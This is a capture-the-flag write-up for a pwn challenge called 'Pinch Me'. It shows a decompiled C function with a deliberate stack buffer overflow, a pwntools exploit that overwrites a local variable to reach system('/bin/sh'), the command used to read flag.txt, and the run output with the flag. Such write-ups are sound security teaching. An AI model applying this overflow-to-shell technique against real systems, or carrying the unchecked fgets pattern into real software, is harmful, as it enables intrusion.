Pinch Me

The vuln function would spawn a shell if local_10 == 0x1337c0de.

void vuln(void)
{
  char local_28 [24];
  int local_10;
  int local_c;
  
  local_c = 0x1234567;
  local_10 = -0x76543211;
  puts("Is this a real life, or is it just a fanta sea?");
  puts("Am I dreaming?");
  fgets(local_28,100,stdin);
  if (local_10 == 0x1337c0de) {
    system("/bin/sh");
  }
  else {
    if (local_c == 0x1234567) {
      puts("Pinch me!");
    }
    else {
      puts("Pinch me harder!");
    }
  }
  return;
}

local_10 located right after user input array, to call vuln with local_10 set to 0x1337c0de, needed to fill the array and append 0x1337c0de to it, so local_10 would be overwritten with 0x1337c0de. Check out here for full source code.

payload = b"A"*24
payload += pwn.p64(0x1337c0de)

print(payload, len(payload))
pr.sendafter("dreaming?\n", payload)
pr.sendline()
pr.sendline('cat flag.txt')
print(pr.readall(2))

cat flag.txt once pwned.

$ python3 exploit.py 
[+] Opening connection to dctf1-chall-pinch-me.westeurope.azurecontainer.io on port 7480: Done
b'AAAAAAAAAAAAAAAAAAAAAAAA\xde\xc07\x13\x00\x00\x00\x00' 32
[+] Receiving all data: Done (37B)
[*] Closed connection to dctf1-chall-pinch-me.westeurope.azurecontainer.io port 7480
b'dctf{y0u_kn0w_wh4t_15_h4pp3n1ng_b75?}'
TOP